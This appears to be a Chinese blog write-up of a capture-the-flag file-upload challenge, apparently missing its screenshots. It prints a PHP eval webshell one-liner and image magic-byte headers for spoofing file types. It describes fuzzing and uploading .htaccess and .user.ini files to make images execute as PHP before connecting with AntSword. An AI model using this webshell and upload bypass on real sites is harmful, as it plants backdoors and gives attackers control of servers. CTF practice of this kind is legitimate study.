做题思路
随便上传了一张png的图片
联想到一个东西
所以这个给你的array可能是当前目录下的文件(我也是后来才知道)
不管了,fuzz一波
更换马的内容为
<script language="php">eval($_POST['shell']);</script>
再次fuzz
修改文件类型
再次fuzz仍然是显示not image!
那就再添加图片欺骗头
JPG :FF D8 FF E0 00 10 4A 46 49 46
GIF(相当于文本的GIF89a):47 49 46 38 39 61
PNG: 89 50 4E 47
这次貌似不一样了
在intruder里没有报错信息,也没任何提示
手工测一下发现能上传成功
那么现在最重要的是如何执行图片里的代码呢
先试试能不能上传.htaccess文件
修改文件类型绕过试试
和之前一样无报错无提示
然后发现能上传.user.ini文件
蚁剑连接(如果连不上重新上传文件)
它每段时间会删除我们上传的文件
扩展:
上传图片后访问11.png
发现里面的代码好像被干掉了
扫一扫
6425
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
